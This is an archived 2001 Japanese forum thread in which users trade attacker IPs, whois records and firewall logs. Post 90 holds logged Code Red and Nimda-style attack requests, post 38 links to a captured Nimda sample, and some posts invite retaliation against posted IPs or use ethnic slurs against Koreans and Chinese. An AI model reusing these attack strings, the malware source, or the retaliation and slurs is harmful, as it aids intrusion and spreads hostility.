クラックしかけてくる奴の国名ランキング(日本除く)

1 ：01/11/11 〜 最終レス ：2013/07/04

とりあえず
1、中国(あからさまだ．．．)
2、韓国(ワームが多いな。まぁいいや)
3、米国(なんかランクダウン)
あとどうぞ。

2 ：

台湾

3 ：

語り尽くされたな・・・

4 ：

中国はおおいよね。追跡はどうすればいいのでしょう？

5 ：

>>4
中国へ行って足で追跡

6 ：

アメリカ台湾はともかく、中国韓国はテロ支援国家だから
しょうがないよな。

7 ：

＞中国韓国はテロ支援国家だから
韓国じゃなくて北朝鮮・・・
あっ。同じか。
逝ってきます。
http://www.lycos.co.jp/weather/world/WK003_week.html

8 ：

国民一人が1秒に一回足し算すれば１GHz。そういう国だ。ひとたまり
もない

9 ：

IPアドレス 193.147.235.51
スペイン？

10 ：

今日の６時頃以上に多くなかったか？　中国と韓国。

11 ：

61.167.116.102
あ〜さっきから中国のやつウザイ

12 ：

.mxドメインからPortmapperやlprを触ってくる奴が最近増えた。

13 ：

ルータ入れるとすっかり静かになるよ。

14 ：

210.152.236.51
あー。。。190回だよ・・
(｀×´)丿ウザイ!!

15 ：

今日は韓国から来まくり

16 ：

>>15　今日“も”でしょ（ｗ

17 ：

>>14
a. [IPネットワークアドレス] 210.152.236.0-210.152.239.0
b. [ネットワーク名] YAHOO-NET
f. [組織名] ヤフー株式会社
g. [Organization] Yahoo Japan Corporation
m. [運用責任者] TN025JP
n. [技術連絡担当者] IT018JP
p. [ネームサーバ] dns1.yahoo.co.jp
p. [ネームサーバ] dnsn201.yahoo.co.jp
p. [ネームサーバ] ns.tokyonet.ad.jp
y. [通知アドレス] siteop@mail.yahoo.co.jp
y. [通知アドレス] jpnic-notify@jp.psi.net
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
yahooの鯖がnimdaにでも感染してるのかな？

18 ：

210.172.64.112 から
I've counted 53 connections.
First connection was made to 3619 port at Tue Nov 13 15:05:43 2001
Last connection was made to 3619 port at Tue Nov 13 15:09:01 2001
I've counted 44 connections.
First connection was made to 3867 port at Tue Nov 13 17:17:23 2001
Last connection was made to 3867 port at Tue Nov 13 17:19:28 2001
I've counted 40 connections.
First connection was made to 4092 port at Tue Nov 13 17:58:06 2001
Last connection was made to 4094 port at Tue Nov 13 17:58:39 2001
210.141.108.226 から
I've counted 46 connections.
First connection was made to 3619 port at Tue Nov 13 15:05:43 2001
Last connection was made to 3619 port at Tue Nov 13 15:09:01 2001
新種の warm でも出たのか?

19 ：

今日も韓国から来まくり。ワームかなぁ
中国からきたやつのIPたまたまブラウザに張ってみたら
黒画面に赤字で”Chinse Hacker”とだけ書いてあって萎え。

20 ：

>>18
今日になって明らかに増えてる。眠りから覚めたか？

21 ：

The firewall has blocked Internet access to your computer
(ICMP Echo Request ('Ping')) from 65.174.182.253.
ZoneAlarmのログ見たらこんなの出てきたんですが･･･
Pingって書いてあるけど大丈夫？

22 ：

>>21
pingぐらいだったら大丈夫だよ。ZoneAlarmは警告表示ありに
しておいた方がいいよ。ただし、ポップアップがうざったいけど

23 ：

>>22
ありがとう。安心したよ。
初めてPing来たからビビッタよ。
一日5回くらいしか警告こないから表示ＯＮにするか。

24 ：

１日に１０回以上あるのですが
それは普通の数と言えるのでしょうか？
韓国、中国が多いのですが。

25 ：

今日は全然ｱﾀｰｸが無くて寂しい

26 ：

韓国はワームしか来ないからいいんだけど中国はなんか頑張ってるねぇ。

27 ：

アタックってどう言う種類があるんですか？
ワーム、トロイぐらいしかわからないんですが・・・
ポートからも侵入できちゃうの？

28 ：

なんで国わかるんですか？

29 ：

>>28
ファイアーウォールのログに残ったIPアドレスを↓とかで検索すればわかる。
http://www.mse.co.jp/ip_domain/

30 ：

CHINANETの連中は他にやること無いのかな？

31 ：

>>30烈しく同感･･･

32 ：

韓国のLEEさん、ほんと暇なんだなぁ。

MAC:0030BE001823

33 ：

韓国だからこっちの「李」かな？　笑

34 ：

漏れんとこも韓国からのアタックが一番多い。
韓国ヤフォに攻撃者公開トピ作っちまおうかな？ｗ

35 ：

>>32
ていうかLEEさん乗っ取られてることに気付いてないんじゃない？

36 ：

韓国は糞管理者しかいないからトピ作っても誰もみなさそう。
80以外のポート狙ってるのが問題。オーストラリアから来てたよ．．．
あとどうでもいいけど福岡市立駐車場の事務室にあるW2000はワームに
やらてるようだな。市立なんだから多少は迷惑lかけないようにしてほしい

37 ：

最近、踏み台利用してなんかしてるのが多いけど
元をたどれば結局、キムチ　

38 ：

61.155.90.92-BEIJING(PEKING)がポート139,445をつついて来るので
試しにブラウザを開いてみたらNIMDAを送ろうとするので有り難くDLしました。
ウイルスチェック実験用に欲しい人はお早めに！（bad→exe）
気にしている人は殆ど対策済みだと思うけど。
http://ftp.sk-kaken.co.jp/readme.bad

39 ：

>>32
うちに来たのもコリアだった。
２ちゃんねるで韓国がボロクソに言われる訳がわかった気がする。
211.226.197.96←逝ってよし！

40 ：

初めて検索してみた｡
ほとんどチャイナネットらしい(61.1XX系が多い？)｡
本当にウザイ人種だな｡

41 ：

メキシコからFTPされて、
ちょっと嬉しい。
148.244.224.1

42 ：

うざい
221.180.149.227

43 ：

たった今211.233.48.127から攻撃されたが、ノートン先生が助けてくれた
役立たずとか思ってたけどありがとうノートン先生。XP用に2002も買うよ
そしてふｃこっｆ211.233.48.127

44 ：

このサイトにサクセスすると、ひたすら113ポートへアクセスしてくる。
http://sv.cmjapan.com/
なんなんだ？

45 ：

　　　　　　　　Port 113 identd/auth
identd。接続の "所有者" の識別に使用されます。
ハッカーに多くの情報を漏らします。ポート 113 との間で
大量の接続を開始することで、 SuSE マシンをダウンさせることができます。

46 ：

>>38
ノートン先生の頼もしさを再確認できたよ。

47 ：

中国おおいね

48 ：

ルータ入れれ。ルータも最近は安いぞ。

49 ：

つぶしてみ
IP　211.223.11.232

50 ：

日本人。

51 ：

パソコン初めて２年ですがウイルスとかと無縁の生活していました。
もちろん最低限の対策はしていますが・・・
ところが来たんです？先程０時４８分に私のＰＣに侵入を試みようと！！
Ｎ、インターネットセキュリティがブロックしてくれて事無きを得ました？
>49 さんのレスのIPでした。（韓国なんですね？）
今後を考えると不安です・・・

52 ：

210 170 99 66 ルータのログで最もしつこいのがこれ。

53 ：

カナダ経由のブラジルさんからが多いね
次が中国やね。

54 ：

さっきから、韓国ウゼェ！
韓国はインターネット禁止！
ノートンを入れてなかったころ、散々踏み台にされてたのかなぁ・・。
韓国逝ってよし！

55 ：

iis狙ってきてるワームの仕業じゃねーの？
サーバでもない君たちのｼｮｯﾊﾟｲマシンなんか踏み台にするかよ
大体ブロックしたとか弾いたとか言う前にポート閉じればいいじゃん

56 ：

>>51
ピンポン・ダッシュみたいなもんだから心配しなくていいよ。

57 ：

南鮮、中国うぜいＹＯ！ついでに北鮮も。

58 ：

>>55
�@リモートホストにアクセスしてきた。
�Aノートンセキュリティの地球儀マークに「！」が点滅した。
�Aにはマジ怖かった。
プリインストのマカフィーの頃は大丈夫だったのかと不安になる。

59 ：

なんかAliz騒ぎで一気に厨房度がupしたな。

60 ：

BADTRANS.Bの話題。別名とっととSP2にあげろ！
今日 Re: というメールがたくさんきました。
中身は空…と、思ったら？

61 ：

CHINANETまーしつこい。並はずれた根性と執念と暇を感じる。
SONY CORPORATION OF HONG KONG LIMITEDの奴もいた。

62 ：

192.168.0.2からたびたび攻撃を受けます！！！
どこの国だろう、ｺﾜﾋｰ（ｗ

63 ：

>>61
CHINANET
ひろみからDLしてるとこるよね？

64 ：

210.194.161.183
こいつしぬほどウザい
殺してくれ

65 ：

>>63
ひろみから？
んースミマセン分かりません、解説をお願い致します。

66 ：

ダウソ板R

67 ：

>>62
おもしろくないネタだ

68 ：

ローカルアドレスからの攻撃ってあるよ
もっと勉強してね。

69 ：

>>62
多分nimda感染に見せかけた社内クラク/アタ−クだ!

70 ：

http://regland.room.ne.jp/~kairaru//bbs/bbs1/fantasy.cgi
Uha!!

71 ：

>>62　俺もそうですよ。
調べたらＩＡＮＡ（インターネット資源管理団体の上位組織？）からでした。
何か気持ち悪いです。

72 ：

[203.204.69.202]
% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois6.apnic.net)
inetnum: 203.204.0.0 - 203.204.127.255
netname: GIGAMEDIA
descr: Hoshin Gigamedia Center Inc.
descr: Cable-Based ISP in Taiwan.
country: TW
admin-c: HIA1-AP
tech-c: HIA1-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-HOSHIN-TW
changed: hostmaster@apnic.net 20001120
source: APNIC
role: HOSHIN IP Administrators
address: 4F, 57, Tung Hsing Rd.,
address: Taipei, Taiwan
country: TW
phone: +886-2-8768-1566 ext.1069
fax-no: +886-2-8768-2987
e-mail: johnson_liu@corp.giga.net.tw
admin-c: CWT1-AP
tech-c: JC97-AP
tech-c: MC60-AP
tech-c: JL126-AP
tech-c: SL424-AP
tech-c: CL244-AP
tech-c: TC153-AP
tech-c: JC367-AP
nic-hdl: HIA1-AP
notify: johnson_liu@corp.giga.net.tw
mnt-by: MAINT-HOSHIN-TW
changed: hostmaster@apnic.net 20001120
source: APNIC
連続5回侵入を試みようとしたバカ。

73 ：

こんなとこからクラックされました。
202.29.32.194
バンコク内閣情報テクノロジーオフィス

74 ：

211.168.25.101
↑こいつも

75 ：

こんどは連続できた。
フィリピン210.23.100.65と
台北台湾211.22.208.22

76 ：

ニューヨーク66.9.114.226
同朋はアフガンで戦ってるのに、
日本にクラックしとる場合かよ。

77 ：

皆攻撃されとるねえ。

78 ：

IP Address : 210.93.218.0-210.93.218.255
Network Name : SYBER
Connect ISP Name : NETSGO
Connect Date : 20010228
Registration Date : 20010813
[ Organization Information ]
Orgnization ID : ORG223642
Org Name : Cyberrics
State : SEOUL
Address : Room1508, Colonporestel Bldg, 45-13, Yeouido-dong,
Zip Code : 150-010

79 ：

207.71.92.22
さっきから10回以上も。。ﾊｧ
Verio, Inc. (NET-VRIO-207-071-064)
8005 South Chester Street
Englewood, CO 80112
US

80 ：

202.96.75.23
チャンさんです
R

81 ：

今日初めてウイルスバスターのログ見たよ。
毎日攻撃されとるやん、俺（藁

82 ：

うちも中国韓国ばっかり〜

83 ：

61.84.195.87
country KR

84 ：

コイツ人のPCに侵入しようとしやがった
メアド書かない
203．141．136．3
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 203.141.136.0-203.141.139.0
b. [ネットワーク名] INTERLINK
f. [組織名] 株式会社インターリンク
g. [Organization] Interlink Co.,Ltd.
m. [運用責任者] YT107JP
n. [技術連絡担当者] YN3315JP
p. [ネームサーバ] tegtan1.interlink.or.jp
p. [ネームサーバ] tegtan2.interlink.or.jp
y. [通知アドレス] iljpnic@interlink.ad.jp
[割当年月日] 1998/01/12
[返却年月日]
[最終更新] 2001/05/16 13:30:04 (JST)

85 ：

NKってどこかね？

86 ：

　　/　／　 　　,,_　　　　　ハァハァ
　━━━━━'）, )＝　　　　　　　　　☆ゴガギーン
　　　　　 ∧_∧ヽ＼　　　　　　　　　／　　　　　　　　　　／￣￣￣￣￣￣￣￣￣￣￣
　　　　　（　　　） 〉　〉_ _ _＿＿＿　　　　　　∧＿∧　∠　　おらっ！出てこい、>>キムチ
　　　　　/　⌒￣ ／ "'''"'|　　　　||　　　　　（｀∀´　）　　＼＿＿＿＿＿＿＿＿＿＿＿
　 　 　　|　　　|￣ｌ　　　　|　　　　|/　 　 　　/ 　 　 ＼
. 　 　　　| 　 　| 　| 　 　　|　　　　||　 　　　 | | 　　/＼ヽ
　 　 　　 |　 　| 　.| 　 　　|　　　　| 　 　 へ//|　　|　　| |
　　　 　 （　　 |　 .|　　　ﾛ|ﾛ　　 ﾞ!ｌ''ヽ／,へ ＼|_ 　| 　 | |
　　 　 　 | .lヽ ＼ |　　　　|　　　ヽ＼／　　＼＿　/　（　）
　　 　　　| .| 　〉 .〉　　　　|　　　　|　　 　　 　 |　|
　　　　　/ /　/ / | 　 　　|　　　 〈|　　　　　　|　|
　　 　　/ /　/ /　| 　 　　|　　　　||　　　　　　|　|
　　　 / /　 / /　└──┴──┘　　 　　　 |　|

87 ：

ウイルスバスターのログってどうやったら見れるの？
自分のもみた〜い！わくわく。

88 ：

ｵﾏｴﾗ侵入とかアタックとかって言うけど実際何やられてんの？？？
ﾎﾟｰﾄｽｷｬﾝとか言うなよ。
何番のポートにどういう事してきたってログ出せよ。
って、どうせネタスレだからどうでもいいか・・・

89 ：

この手のｽﾚはﾏﾀｰﾘｦｯﾁです。。。
>>88
#どうせpingだろうけどね。。。

90 ：

210.113.224.155 - - [27/Sep/2001:16:51:32 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucb
d3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 215
CodeRedの痕跡
210.179.120.1 - - [28/Sep/2001:00:49:44 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 234
210.179.120.1 - - [28/Sep/2001:00:49:45 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:46 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:47 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:49 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:50 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:51 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:52 +0900] "GET /msadc/..%5c../..%5c../..%5c/..ﾁ../..ﾁ../..ﾁ../winnt/system32/cmd.exe HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:53 +0900] "GET /scripts/..ﾁ../winnt/system32/cmd.exe HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:53 +0900] "GET /sc?/c+dir HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:54 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:55 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:56 +0900] "GET /scripts/..・c../winnt/system32/cmd.exe HTTP/1.0" 400 190
210.179.120.1 - - [28/Sep/2001:00:49:57 +0900] "GET /scripts/..・c../winnt/system32/cmd.exe HTTP/1.0" 400 190
210.179.120.1 - - [28/Sep/2001:00:49:58 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:59 +0900] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 215
某凶悪ウィルス
M$のクソサバじゃなかったからよかったわヽ(｀Д´;)ノ

91 ：

改行ミスごめん

92 ：

高性能トロイ「sub7」のダウンロードサイトとツールの使用法を教えてください。

93 ：

早朝からウザイ
IP: 211.107.30.150
NetBIOS: WORKGROUP 
Node: LEEIKSEUNG
Group: WORKGROUP
MAC: 444553547777
DNS: LEEIKSEUNG

94 ：

>>92
そんなものを欲しがらないで下さい
つかugサイトにRば腐るほどあるだろうが

95 ：

IP: 210.253.85.248
DNS: oska6640.ppp.infoweb.ne.jp
２回きたんだ　どうかたつけようか検討中
参加者募る　レスまってるじぇ

96 ：

>>95
どんなのが2回着た？ログ貼れ

97 ：

207.71.92.221
ここから200回くらいアタックを受けてるんですけど、
何者なんでしょう？
verio.netっていうところなんですけど・・・？

98 ：

きっと友達になりたいんだよ。
ほほえましいじゃないか。
ちなみに私は一日761回アタック受けたことあるよ。

99 ：

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois7.apnic.net)
inetnum: 61.158.34.224 - 61.158.34.255
netname: SANLIAN-NETBAR
descr: San lian netbar
country: CN
admin-c: CX58-AP
tech-c: CX58-AP
mnt-by: MAINT-CHINANET-HL
changed: chexs@public.hr.hl.cn 20001229
source: APNIC
person: CHE XUESONG
address: HEILONGJIANG Province liu chuansen
country: CN
phone: +86-0451-5630553
fax-no: +86-0451-5630553
e-mail: chexs@public.hr.hl.cn
nic-hdl: CX58-AP
mnt-by: MAINT-CHINANET-HL
changed: chexs@public.hr.hl.cn 20000804
source: APNIC
未使用ポートブロックに通信してくるのですが
これはなんですか？

100read 1read

1read 100read
TOP カテ一覧 スレ一覧 2ch元 削除依頼 ▲

究極のインターネットセキュリティーとは (471)
ｳｲﾙｽﾊﾞｽﾀｰ2006(仮称)ﾍﾞｰﾀ版　Part1 (668)
WMF 脆弱性対策スレッド (464)
【顧客】ネットショップのセキュリティー【情報】 (189)
ファイアーウォールなんて必要ありません (563)
あやしいファイルを実行するスレ 2層目 (765)
--log9.info------------------
◆◇◆縫って着る！洋裁スレ◆◇◆Part21 (120)
手芸板以外で通い詰めているスレを晒すスレ (268)
【低価格も】刺繍ﾐｼﾝ2台目【高価格も】 (297)
【厚紙】カルトナージュ　その3【工作】 (709)
【振袖】和裁【浴衣】 part5 (164)
★レジン・樹脂について語ろう★4 (334)
【大人用】立体裁断型紙屋７【ネット通販】 (116)
ビーズ教室情報 (598)
◆Ｖｉｄａ＝Ｆｅｌｉz◆＜キャンドル＞1本目 (796)
☆★ペーパークラフト★☆ (578)
MJハンクラ部5 (923)
シャドーボックスしている方いますか？ (161)
↑と↓のスレタイを合体させて遊ぶスレinハンクラ板 (926)
手縫いで作るレザークラフト　趣味のみ　2針目 (142)
【1月1日限定】おみくじはここでやれ (701)
…失敗と教訓… (117)
--log55.com------------------
完璧に整えること
お金持ちになりたい
駅名こたついでたた引き湯みと青やすり曲がった
大好きな人への独り言265
うんこiと丸山穂高
言いたいことだけ言って立ち去るスレッドPart2743
おしずし×まるちょう
まのスレ